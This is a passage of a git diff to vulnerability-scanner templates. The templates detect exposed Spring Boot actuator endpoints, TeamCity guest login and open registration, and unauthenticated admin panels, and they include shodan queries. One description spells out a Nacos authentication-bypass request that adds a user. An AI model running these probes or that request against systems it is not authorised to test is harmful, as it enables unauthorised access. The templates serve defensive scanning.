+        words:
+          - "cacheManagers"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "application/vnd.spring-boot.actuator"
+          - "application/vnd.spring-boot.actuator.v1+json"
+          - "application/vnd.spring-boot.actuator.v2+json"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-configprops.yaml b/misconfiguration/springboot/springboot-configprops.yaml
index 35954af39f..d506808fd4 100644
--- a/misconfiguration/springboot/springboot-configprops.yaml
+++ b/misconfiguration/springboot/springboot-configprops.yaml
@@ -12,6 +12,8 @@ requests:
     path:
       - "{{BaseURL}}/configprops"
       - "{{BaseURL}}/actuator/configprops"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/springboot/springboot-dump.yaml b/misconfiguration/springboot/springboot-dump.yaml
index a4d6571c3d..eb012a4284 100644
--- a/misconfiguration/springboot/springboot-dump.yaml
+++ b/misconfiguration/springboot/springboot-dump.yaml
@@ -13,6 +13,7 @@ requests:
       - "{{BaseURL}}/dump"
       - "{{BaseURL}}/actuator/dump"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml
index bd51134c8f..a13d6f7bc0 100644
--- a/misconfiguration/springboot/springboot-env.yaml
+++ b/misconfiguration/springboot/springboot-env.yaml
@@ -12,6 +12,8 @@ requests:
     path:
       - "{{BaseURL}}/env"
       - "{{BaseURL}}/actuator/env"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -28,14 +30,15 @@ requests:
           - "local.server.port"
         condition: or
 
-      - type: status
-        status:
-          - 200
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v1+json"
           - "application/vnd.spring-boot.actuator.v2+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-flyway.yaml b/misconfiguration/springboot/springboot-flyway.yaml
new file mode 100644
index 0000000000..37eaf303e0
--- /dev/null
+++ b/misconfiguration/springboot/springboot-flyway.yaml
@@ -0,0 +1,39 @@
+id: springboot-flyway
+
+info:
+  name: Springboot Flyway API
+  author: ELSFA7110
+  severity: low
+  description: This endpoint to retrieve the migrations
+  reference:
+    - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#flyway
+  metadata:
+    verified: true
+  tags: misconfig,springboot,exposure,flyway
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/flyway"
+      - "{{BaseURL}}/actuator/flyway"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "flywayBeans"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "application/vnd.spring-boot.actuator"
+          - "application/vnd.spring-boot.actuator.v1+json"
+          - "application/vnd.spring-boot.actuator.v2+json"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-health.yaml b/misconfiguration/springboot/springboot-health.yaml
index 42339354c4..bede2a08a5 100644
--- a/misconfiguration/springboot/springboot-health.yaml
+++ b/misconfiguration/springboot/springboot-health.yaml
@@ -13,6 +13,7 @@ requests:
       - "{{BaseURL}}/health"
       - "{{BaseURL}}/actuator/health"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/springboot/springboot-heapdump.yaml b/misconfiguration/springboot/springboot-heapdump.yaml
index 51a66859dc..3ea2dd0113 100644
--- a/misconfiguration/springboot/springboot-heapdump.yaml
+++ b/misconfiguration/springboot/springboot-heapdump.yaml
@@ -1,10 +1,12 @@
 id: springboot-heapdump
 
 info:
-  name: Detect Springboot Heapdump Actuator
+  name: Spring Boot Actuator - Heap Dump Detection
   author: that_juan_,dwisiswant0,wdahlenb
   severity: critical
-  description: Environment variables and HTTP requests can be found in the HPROF
+  description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests.
+  reference:
+    - https://github.com/pyn3rd/Spring-Boot-Vulnerability
   tags: springboot,exposure
 
 requests:
@@ -13,6 +15,7 @@ requests:
       - "{{BaseURL}}/heapdump"
       - "{{BaseURL}}/actuator/heapdump"
 
+    stop-at-first-match: true
     max-size: 2097152 # 2MB - Max Size to read from server response
     matchers-condition: and
     matchers:
@@ -28,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/misconfiguration/springboot/springboot-httptrace.yaml b/misconfiguration/springboot/springboot-httptrace.yaml
index f91a784635..9d1ac10ea3 100644
--- a/misconfiguration/springboot/springboot-httptrace.yaml
+++ b/misconfiguration/springboot/springboot-httptrace.yaml
@@ -12,6 +12,8 @@ requests:
     path:
       - "{{BaseURL}}/httptrace"
       - "{{BaseURL}}/actuator/httptrace"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -23,14 +25,14 @@ requests:
           - '"session"'
         condition: and
 
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v1+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-info.yaml b/misconfiguration/springboot/springboot-info.yaml
index c9d77a9f5f..520c98e41c 100644
--- a/misconfiguration/springboot/springboot-info.yaml
+++ b/misconfiguration/springboot/springboot-info.yaml
@@ -13,6 +13,7 @@ requests:
       - "{{BaseURL}}/info"
       - "{{BaseURL}}/actuator/info"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -22,15 +23,15 @@ requests:
           - '"artifact"'
         condition: and
 
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v2+json"
           - "application/vnd.spring-boot.actuator.v1+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-liquidbase.yaml b/misconfiguration/springboot/springboot-liquidbase.yaml
new file mode 100644
index 0000000000..be39536d31
--- /dev/null
+++ b/misconfiguration/springboot/springboot-liquidbase.yaml
@@ -0,0 +1,41 @@
+id: springboot-liquidbase
+
+info:
+  name: Springboot Liquidbase API
+  author: ELSFA7110
+  severity: low
+  description: This liquibase endpoint provides information about database changes
+  reference:
+    - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#liquibase
+  metadata:
+    verified: true
+  tags: misconfig,springboot,exposure,liquibase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/liquibase"
+      - "{{BaseURL}}/actuator/liquibase"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'liquibase'
+          - '"FILENAME":"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "application/vnd.spring-boot.actuator"
+          - "application/vnd.spring-boot.actuator.v1+json"
+          - "application/vnd.spring-boot.actuator.v2+json"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-loggers.yaml b/misconfiguration/springboot/springboot-loggers.yaml
index 15abdb57f7..90b54bc179 100644
--- a/misconfiguration/springboot/springboot-loggers.yaml
+++ b/misconfiguration/springboot/springboot-loggers.yaml
@@ -12,6 +12,7 @@ requests:
       - "{{BaseURL}}/loggers"
       - "{{BaseURL}}/actuator/loggers"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -21,14 +22,14 @@ requests:
           - '"levels"'
         condition: and
 
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v1+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-mappings.yaml b/misconfiguration/springboot/springboot-mappings.yaml
index c6b4f9bfef..e4f31f74fc 100644
--- a/misconfiguration/springboot/springboot-mappings.yaml
+++ b/misconfiguration/springboot/springboot-mappings.yaml
@@ -12,6 +12,8 @@ requests:
     path:
       - "{{BaseURL}}/mappings"
       - "{{BaseURL}}/actuator/mappings"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -21,13 +23,15 @@ requests:
           - "method"
           - "produces"
         condition: and
-      - type: status
-        status:
-          - 200
+
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v1+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-metrics.yaml b/misconfiguration/springboot/springboot-metrics.yaml
index 7c2b07e57d..90ef98f86d 100644
--- a/misconfiguration/springboot/springboot-metrics.yaml
+++ b/misconfiguration/springboot/springboot-metrics.yaml
@@ -13,6 +13,7 @@ requests:
       - "{{BaseURL}}/metrics"
       - "{{BaseURL}}/actuator/metrics"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/springboot/springboot-scheduledtasks.yaml b/misconfiguration/springboot/springboot-scheduledtasks.yaml
new file mode 100644
index 0000000000..bcf58964f4
--- /dev/null
+++ b/misconfiguration/springboot/springboot-scheduledtasks.yaml
@@ -0,0 +1,41 @@
+id: springboot-scheduledtasks
+
+info:
+  name: Springboot Scheduledtasks Actuator
+  author: ELSFA7110
+  severity: info
+  description: This endpoint to retrieve the scheduled tasks
+  reference:
+    - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#scheduled-tasks
+  metadata:
+    verified: true
+  tags: misconfig,springboot,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/scheduledtasks"
+      - "{{BaseURL}}/actuator/scheduledtasks"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "cron"
+          - "fixedDelay"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "application/vnd.spring-boot.actuator"
+          - "application/vnd.spring-boot.actuator.v1+json"
+          - "application/vnd.spring-boot.actuator.v2+json"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-threaddump.yaml b/misconfiguration/springboot/springboot-threaddump.yaml
index 64b61d6007..48b4aa4ad5 100644
--- a/misconfiguration/springboot/springboot-threaddump.yaml
+++ b/misconfiguration/springboot/springboot-threaddump.yaml
@@ -15,6 +15,7 @@ requests:
       - "{{BaseURL}}/threaddump"
       - "{{BaseURL}}/actuator/threaddump"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -24,15 +25,15 @@ requests:
           - '"threadName":'
         condition: and
 
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v2+json"
           - "application/vnd.spring-boot.actuator.v1+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/springboot/springboot-trace.yaml b/misconfiguration/springboot/springboot-trace.yaml
index f46ae43eec..8adc50944c 100644
--- a/misconfiguration/springboot/springboot-trace.yaml
+++ b/misconfiguration/springboot/springboot-trace.yaml
@@ -5,7 +5,7 @@ info:
   author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   description: View recent HTTP requests and responses
-  tags: springboot,exposure
+  tags: misconfig,springboot,exposure
 
 requests:
   - method: GET
@@ -23,14 +23,14 @@ requests:
           - '"path"'
         condition: and
 
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: header
         words:
           - "application/json"
           - "application/vnd.spring-boot.actuator"
           - "application/vnd.spring-boot.actuator.v1+json"
         condition: or
-        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/symfony-debugmode.yaml b/misconfiguration/symfony-debug.yaml
similarity index 79%
rename from misconfiguration/symfony-debugmode.yaml
rename to misconfiguration/symfony-debug.yaml
index 642e44402b..bdc1ec3bf7 100644
--- a/misconfiguration/symfony-debugmode.yaml
+++ b/misconfiguration/symfony-debug.yaml
@@ -1,4 +1,4 @@
-id: symfony-debugmode
+id: symfony-debug
 
 info:
   name: Symfony Debug Mode
@@ -7,6 +7,9 @@ info:
   description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code.
   reference:
     - https://github.com/synacktiv/eos
+  metadata:
+    verified: true
+    shodan-query: http.html:"symfony Profiler"
   tags: symfony,debug
 
 requests:
@@ -16,17 +19,17 @@ requests:
 
     matchers-condition: or
     matchers:
-
       - type: word
-        words:
-          - 'X-Debug-Token-Link:'
-          - '/_profiler/'
         part: header
+        words:
+          - 'x-debug-token-link:'
+          - '/_profiler/'
         condition: and
+        case-insensitive: true
 
       - type: word
+        part: body
         words:
           - 'debug mode</a> is enabled.'
-        part: body
 
 # Enhanced by mp on 2022/04/12
diff --git a/misconfiguration/tcpconfig.yaml b/misconfiguration/tcpconfig.yaml
index 72d07f52c4..3ea0544410 100644
--- a/misconfiguration/tcpconfig.yaml
+++ b/misconfiguration/tcpconfig.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6782
-  tags: logs,config
+  tags: config,edb,logs
 
 requests:
   - method: GET
diff --git a/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml b/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
new file mode 100644
index 0000000000..00b2622df5
--- /dev/null
+++ b/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
@@ -0,0 +1,38 @@
+id: teamcity-guest-login-enabled
+
+info:
+  name: JetBrains TeamCity - Guest User Access Enabled
+  author: Ph33r
+  severity: high
+  description: |
+    TeamCity provides the ability to turn on the guest login allowing anonymous access to the TeamCity UI.
+  reference:
+    - https://ph33r.medium.com/misconfig-in-teamcity-panel-lead-to-auth-bypass-in-apache-org-exploit-146f6a1a4e2b
+    - https://www.jetbrains.com/help/teamcity/guest-user.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 7.30
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    shodan-query: http.component:"TeamCity"
+  tags: misconfig,teamcity,jetbrains
+
+requests:
+  - raw:
+      - |
+        GET /guestLogin.html?guest=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Location: /overview.html'
+          - 'TCSESSIONID='
+        condition: and
+
+      - type: status
+        status:
+          - 302
diff --git a/misconfiguration/teamcity/teamcity-registration-enabled.yaml b/misconfiguration/teamcity/teamcity-registration-enabled.yaml
new file mode 100644
index 0000000000..8013cfc12e
--- /dev/null
+++ b/misconfiguration/teamcity/teamcity-registration-enabled.yaml
@@ -0,0 +1,33 @@
+id: teamcity-registration-enabled
+
+info:
+  name: JetBrains TeamCity - Registration Enabled
+  author: Ph33r
+  severity: high
+  description: |
+    JetBrains TeamCity allows all visitors to register due to a misconfiguration.
+  reference:
+    - https://ph33r.medium.com/misconfig-in-teamcity-panel-lead-to-auth-bypass-in-apache-org-0day-146f6a1a4e2b
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 7.30
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    shodan-query: http.component:"TeamCity"
+  tags: misconfig,auth-bypass,teamcity,jetbrains
+
+requests:
+  - raw:
+      - |
+        GET /registerUser.html?init=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        words:
+          - '<title>Register a New User Account ? TeamCity</title>'
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/unauth-fastvue-dashboard.yaml b/misconfiguration/unauth-fastvue-dashboard.yaml
new file mode 100644
index 0000000000..58b1e61f7f
--- /dev/null
+++ b/misconfiguration/unauth-fastvue-dashboard.yaml
@@ -0,0 +1,32 @@
+id: unauth-fastvue-dashboard
+
+info:
+  name: Unauthenticated Fastvue Dashboard
+  author: DhiyaneshDK
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1117549627
+  tags: panel,fastvue,unauth,misconfig
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dashboard.aspx"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Fastvue Sophos Reporter</title>"
+          - "<title>Fastvue Reporter for SonicWall</title>"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "Dashboard"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/unauth-wavink-panel.yaml b/misconfiguration/unauth-wavink-panel.yaml
index 752e478a10..67553706e5 100644
--- a/misconfiguration/unauth-wavink-panel.yaml
+++ b/misconfiguration/unauth-wavink-panel.yaml
@@ -1,9 +1,10 @@
 id: unauth-wavink-panel
 
 info:
-  name: Unauthenticated Wavlink Panel
+  name: Wavlink Panel - Unauthenticated Access
   author: princechaddha
   severity: high
+  description: Wavlink Panel was able to be accessed with no authentication requirements in place.
   metadata:
     verified: true
     shodan-query: http.title:"Wi-Fi APP Login"
@@ -42,3 +43,5 @@ requests:
         group: 1
         regex:
           - 'var passphraseKey12="(.*)";'
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/unauthenticated-alert-manager.yaml b/misconfiguration/unauthenticated-alert-manager.yaml
index 0dd6d1ad84..2512ba26c4 100644
--- a/misconfiguration/unauthenticated-alert-manager.yaml
+++ b/misconfiguration/unauthenticated-alert-manager.yaml
@@ -1,11 +1,12 @@
 id: unauthenticated-alert-manager
 
 info:
-  name: Unauthenticated Alert Manager
+  name: Alert Manager - Unauthenticated Access
   author: dhiyaneshDK
   severity: high
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22
+  description: Alert Manager was able to be accessed with no authentication requirements in place.
+  metadata:
+    shodan-query: http.title:"Alertmanager"
   tags: unauth,alertmanager
 
 requests:
@@ -22,3 +23,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/unauthenticated-glowroot.yaml b/misconfiguration/unauthenticated-glowroot.yaml
index 12e73021c2..a1aaf482f7 100644
--- a/misconfiguration/unauthenticated-glowroot.yaml
+++ b/misconfiguration/unauthenticated-glowroot.yaml
@@ -1,32 +1,33 @@
-id: unauthenticated-glowroot
+id: unauthenticated-glowroot
 
-info:
-  name: Glowroot Anonymous User
-  author: pussycat0x
-  severity: high
-  description: Anonymous user access allows to understand the host internals
-  reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22
-  tags: misconfig,unauth,glowroot
+info:
+  name: Glowroot Anonymous User
+  author: pussycat0x
+  severity: high
+  description: Anonymous user access allows to understand the host internals
+  metadata:
+    shodan-query: http.title:"Glowroot"
+  tags: misconfig,unauth,glowroot
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/backend/admin/users?username=anonymous'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '"username":"anonymous"'
-          - '"Administrator"'
-          - '"newPassword":""'
-        condition: and
-
-      - type: word
-        words:
-          - "application/json"
-        part: header
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/backend/admin/users?username=anonymous'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"username":"anonymous"'
+          - '"Administrator"'
+          - '"newPassword":""'
+        condition: and
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/unauthenticated-influxdb.yaml b/misconfiguration/unauthenticated-influxdb.yaml
deleted file mode 100644
index 04d3a6836a..0000000000
--- a/misconfiguration/unauthenticated-influxdb.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: unauthenticated-influxdb
-
-info:
-  name: Unauthentication InfluxDB Detection
-  author: pussycat0x
-  severity: high
-  metadata:
-    shodan-dork: InfluxDB
-  tags: unauth,db,influxdb,misconfig
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"results":'
-          - '"name":"databases"'
-        condition: and
-
-      - type: status
-        status:
-          - 200
\ No newline at end of file
diff --git a/misconfiguration/unauthenticated-lansweeper.yaml b/misconfiguration/unauthenticated-lansweeper.yaml
index 90c3fa5708..c7c5563863 100644
--- a/misconfiguration/unauthenticated-lansweeper.yaml
+++ b/misconfiguration/unauthenticated-lansweeper.yaml
@@ -1,17 +1,17 @@
-id: unauthenticated-lansweeper
+id: unauthenticated-lansweeper
 
-info:
-  name: Unauthenticated Lansweeper Instance
-  author: divya_mudgal
-  severity: high
-  tags: lansweeper,unauth
+info:
+  name: Unauthenticated Lansweeper Instance
+  author: divya_mudgal
+  severity: high
+  tags: lansweeper,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/Default.aspx"
-
-    matchers:
-      - type: word
-        words:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Default.aspx"
+
+    matchers:
+      - type: word
+        words:
           - "Main page - Lansweeper"
\ No newline at end of file
diff --git a/misconfiguration/unauthenticated-mongo-express.yaml b/misconfiguration/unauthenticated-mongo-express.yaml
index 68416a63c1..8451392883 100644
--- a/misconfiguration/unauthenticated-mongo-express.yaml
+++ b/misconfiguration/unauthenticated-mongo-express.yaml
@@ -1,12 +1,13 @@
 id: unauthenticated-mongo-express
 
 info:
-  name: Mongo Express Unauthenticated
+  name: Mongo Express - Unauthenticated Access
   author: dhiyaneshDK,b0rn2r00t
   severity: high
+  description: Mongo Express was able to be access with no authentication requirements in place.
   reference:
     - https://www.exploit-db.com/ghdb/5684
-  tags: mongo,unauth
+  tags: mongo,unauth,edb
 
 requests:
   - method: GET
@@ -25,3 +26,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/20
diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml
index 1c69ac5852..38b6ac2224 100644
--- a/misconfiguration/unauthenticated-nacos-access.yaml
+++ b/misconfiguration/unauthenticated-nacos-access.yaml
@@ -1,11 +1,13 @@
 id: unauthenticated-nacos-access
 
 info:
-  name: Unauthenticated Nacos access v1.x
+  name: Nacos 1.x - Authentication Bypass
   author: taielab,pikpikcu
   severity: critical
+  description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
   reference:
     - https://github.com/alibaba/nacos/issues/4593
+    - https://nacos.io/en-us/docs/auth.html
   tags: nacos,unauth
 
 requests:
@@ -34,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/misconfiguration/unauthenticated-popup-upload.yaml b/misconfiguration/unauthenticated-popup-upload.yaml
index 0e63836d0a..650c47958b 100644
--- a/misconfiguration/unauthenticated-popup-upload.yaml
+++ b/misconfiguration/unauthenticated-popup-upload.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6671
-  tags: fileupload,upload
+  tags: edb,fileupload
 
 requests:
   - method: GET
diff --git a/misconfiguration/unauthenticated-prtg.yaml b/misconfiguration/unauthenticated-prtg.yaml
index 0fd245d544..93a9e0e904 100644
--- a/misconfiguration/unauthenticated-prtg.yaml
+++ b/misconfiguration/unauthenticated-prtg.yaml
@@ -1,12 +1,13 @@
 id: unauthenticated-prtg
 
 info:
-  name: Unauthenticated PRTG Traffic Grapher
+  name: PRTG Traffic Grapher - Unauthenticated Access
   author: dhiyaneshDK
   severity: high
+  description: PRTG Traffic Grapher was able to be accessed with no authentication requirements in place.
   reference:
     - https://www.exploit-db.com/ghdb/5808
-  tags: config,unauth,prtg
+  tags: config,unauth,prtg,edb
 
 requests:
   - method: GET
@@ -23,3 +24,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/20
diff --git a/misconfiguration/unauthenticated-tensorboard.yaml b/misconfiguration/unauthenticated-tensorboard.yaml
index 88db2175d9..816f6361a1 100644
--- a/misconfiguration/unauthenticated-tensorboard.yaml
+++ b/misconfiguration/unauthenticated-tensorboard.yaml
@@ -1,8 +1,9 @@
 id: unauthenticated-tensorboard
 
 info:
-  name: Unauthenticated Tensorboard by Tensorflow
+  name: Tensorflow Tensorboard - Unauthenticated Access
   author: dhiyaneshDk
+  description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place.
   severity: high
   tags: tensorflow,tensorboard,unauth
 
@@ -22,4 +23,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/07/20
diff --git a/misconfiguration/unauthenticated-varnish-cache-purge.yaml b/misconfiguration/unauthenticated-varnish-cache-purge.yaml
index 7f9941f12f..d2ff11ea1c 100644
--- a/misconfiguration/unauthenticated-varnish-cache-purge.yaml
+++ b/misconfiguration/unauthenticated-varnish-cache-purge.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
     - https://hackerone.com/reports/154278
-  tags: varnish,misconfig,cache
+  tags: misconfig,cache,hackerone,varnish
 
 requests:
   - method: PURGE
diff --git a/misconfiguration/unauthorized-h3csecparh-login.yaml b/misconfiguration/unauthorized-h3csecparh-login.yaml
index 952e876faf..ccc11f21e6 100644
--- a/misconfiguration/unauthorized-h3csecparh-login.yaml
+++ b/misconfiguration/unauthorized-h3csecparh-login.yaml
@@ -1,9 +1,10 @@
 id: unauthorized-h3csecparh-login
 
 info:
-  name: Unauthorized H3C Secparh Login
+  name: H3C Server - Unauthenticated Access
   author: ritikchaddha
   severity: high
+  description: H3C server was able to be accessed with no authentication requirements in place.
   metadata:
     verified: true
     shodan-query: http.html:"H3C-SecPath-运维审计系统"
@@ -28,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/unauthorized-plastic-scm.yaml b/misconfiguration/unauthorized-plastic-scm.yaml
index 9a5dc4dc7a..7431f84fe0 100644
--- a/misconfiguration/unauthorized-plastic-scm.yaml
+++ b/misconfiguration/unauthorized-plastic-scm.yaml
@@ -1,11 +1,16 @@
 id: unauthorized-plastic-scm
 
 info:
-  name: Unauthorized Access to Plastic Admin Console
+  name: Plastic Admin Console - Authentication Bypass
   author: DEENA
   severity: critical
+  description: A Plastic Admin console was discovered.
   reference:
     - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
+  classification:
+    cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-288
   tags: plastic
 
 requests:
@@ -48,3 +53,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/23
diff --git a/misconfiguration/unauthorized-puppet-node-manager-detect.yaml b/misconfiguration/unauthorized-puppet-node-manager-detect.yaml
index 2ee4377bda..1e411a7ba4 100644
--- a/misconfiguration/unauthorized-puppet-node-manager-detect.yaml
+++ b/misconfiguration/unauthorized-puppet-node-manager-detect.yaml
@@ -1,24 +1,24 @@
-id: unauthorized-puppet-node-manager
+id: unauthorized-puppet-node-manager
 
-info:
-  name: Pupet Node Manager
-  author: pussycat0x
-  severity: medium
-  metadata:
-    fofa-dork: 'app="puppet-Node-Manager"'
-  tags: node,misconfig
+info:
+  name: Pupet Node Manager
+  author: pussycat0x
+  severity: medium
+  metadata:
+    fofa-dork: 'app="puppet-Node-Manager"'
+  tags: node,misconfig
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<a href="/nodes">Nodes</a>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<a href="/nodes">Nodes</a>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/ups-status.yaml b/misconfiguration/ups-status.yaml
index aa2e68067a..c4bf139637 100644
--- a/misconfiguration/ups-status.yaml
+++ b/misconfiguration/ups-status.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/752
-  tags: logs,status
+  tags: logs,status,edb
 
 requests:
   - method: GET
diff --git a/misconfiguration/viewpoint-system-status.yaml b/misconfiguration/viewpoint-system-status.yaml
index 72a8e74552..7d0e87a274 100644
--- a/misconfiguration/viewpoint-system-status.yaml
+++ b/misconfiguration/viewpoint-system-status.yaml
@@ -4,8 +4,8 @@ info:
   name: ViewPoint System Status
   author: dhiyaneshDK
   severity: low
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22
+  metadata:
+    shodan-query: http.title:"ViewPoint System Status"
   tags: status,exposures,viewpoint
 
 requests:
diff --git a/misconfiguration/wamp-server-configuration.yaml b/misconfiguration/wamp-server-configuration.yaml
